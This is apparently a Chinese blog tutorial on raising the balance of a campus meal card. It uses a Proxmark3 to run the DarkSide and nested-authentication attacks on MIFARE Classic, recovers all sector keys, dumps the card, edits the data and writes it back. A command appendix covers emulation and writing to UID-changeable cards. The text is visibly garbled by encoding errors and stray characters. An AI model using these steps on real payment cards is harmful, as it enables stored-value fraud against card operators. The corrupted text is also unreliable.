對于無線射頻卡RFID小弟有所研究今日分享一篇關(guān)于修改飯卡金額的文章
如果對ID猎提,IC卡還不是很了解先看看raidwar的文章把,驅(qū)動什么的請自行百度
以及命令幫助
使用Proxmark3進(jìn)行MIFARE Classic卡的安全測試
以及數(shù)據(jù)分析
下面進(jìn)入正題
首先
驅(qū)動裝好之后可以看到設(shè)備管理器中查看 發(fā)現(xiàn)proxmark3使用是COM5端口
proxmark3.exe COM5
hw tune
成功后如下顯示
此時講自己的高頻卡放上去然后直接使用命令
hf mf mifare
如果
找到 validkey 則直接使用命令:?
(必須知道一個正確的Key方可進(jìn)行相關(guān)的操作)
hf mf nested 1 0 A ffffffffffff
基于驗(yàn)證漏洞進(jìn)行全卡區(qū)域Key破解?
如果結(jié)果為
則 ? 再次進(jìn)行漏洞循環(huán)破解
hf mf mifare 524bb6a2?
直到找到正確密碼為止(顯示Found valid key)
找到密碼后使用(測試嵌套認(rèn)證漏洞旁蔼,基于一個已知Key锨苏,獲取都有扇區(qū)Keys)
hf mf nested 1 0 A ffffffffffff d
導(dǎo)出密碼二進(jìn)制文件,接著使用
hf mf dump
dump數(shù)據(jù)到bin文件 后分析修改數(shù)據(jù)后再次導(dǎo)入
使用命令以二進(jìn)制方式恢復(fù)數(shù)據(jù)到空白的MIFARE classic卡
hf mf restore
完成
附錄
hf mf (MIFARE卡的相關(guān)命令...)
help顯示幫助
dbg設(shè)置默認(rèn)調(diào)試模式
rdbl讀取MIFARE classic卡的區(qū)塊數(shù)據(jù)
rdsc讀取MIFARE classic卡的扇區(qū)數(shù)據(jù)
dump導(dǎo)出MIFARE classic卡的數(shù)據(jù)到二進(jìn)制文件
restore從二進(jìn)制文件恢復(fù)數(shù)據(jù)到空白的MIFARE classic卡
wrbl改寫MIFARE classic卡的區(qū)塊數(shù)據(jù)
chk測試MIFARE classic卡的各個區(qū)塊KEY A/B
mifare基于PRNG漏洞棺聊,執(zhí)行mifare “DarkSide”攻擊操作
nested測試嵌套認(rèn)證漏洞伞租,基于一個已知Key,獲取都有扇區(qū)Keys
sniff嗅卡片與讀寫器之間的通訊(等同于hf 14a snoop)
sim模擬一個MIFARE卡片
eclr清除仿真內(nèi)存的各區(qū)塊數(shù)據(jù)
eget獲取仿真內(nèi)存的各區(qū)塊數(shù)據(jù)
eset設(shè)置仿真內(nèi)存的各區(qū)塊數(shù)據(jù)
eload從導(dǎo)出的文件加載仿真數(shù)據(jù)
esave導(dǎo)出保存仿真數(shù)據(jù)到文件
ecfill利用仿真器的keys來填補(bǔ)仿真內(nèi)存
ekeyprn打印輸出仿真內(nèi)存中的keys
csetuid直接設(shè)置可改UID卡的UID
csetblk把對應(yīng)區(qū)塊數(shù)據(jù)寫入UID卡
cgetblk讀取UID卡對應(yīng)區(qū)塊數(shù)據(jù)
cgetsc讀取UID卡對應(yīng)扇區(qū)數(shù)據(jù)
cload寫入dump數(shù)據(jù)到UID卡限佩。注意
csave保存UID卡數(shù)據(jù)到文件或者仿真內(nèi)存